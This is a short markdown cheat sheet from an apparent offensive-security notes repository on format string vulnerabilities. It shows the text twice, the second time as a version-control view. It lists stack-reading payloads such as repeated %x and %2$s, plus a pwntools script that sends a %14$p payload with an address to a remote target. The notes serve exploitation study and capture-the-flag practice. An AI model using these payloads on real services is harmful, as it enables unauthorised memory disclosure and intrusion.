killchain-compendium/exploit/binaries/format_string/format_string.md

# Format String

* Read and write values from stack

## Read

* Input `%x` for every value that should be read from the stack
```sh
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x 
```
* Select values as string, e.g. the second value
```sh
%2$s
```
* Another way of reading is via `%p`

* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
```python
from pwn import *

#p = process('./vuln')
p = remote(target_ip, 9006)

payload = b'%14$p||||'                                                                                                         
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())
```
ettercap and binaries 2022-05-05 09:31:18 +02:00			`# Format String`

			`* Read and write values from stack`

			`## Read`

			* Input `%x` for every value that should be read from the stack
			```sh
			`%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x`
			```
			`* Select values as string, e.g. the second value`
			```sh
			`%2$s`
			```
			* Another way of reading is via `%p`

			`* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one`
			```python
			`from pwn import *`

			`#p = process('./vuln')`
			`p = remote(target_ip, 9006)`

			`payload = b'%14$p\|\|\|\|'`
			`payload += p32(0x8048000)`

			`p.sendline(payload)`
			`log.info(p.clean())`
			```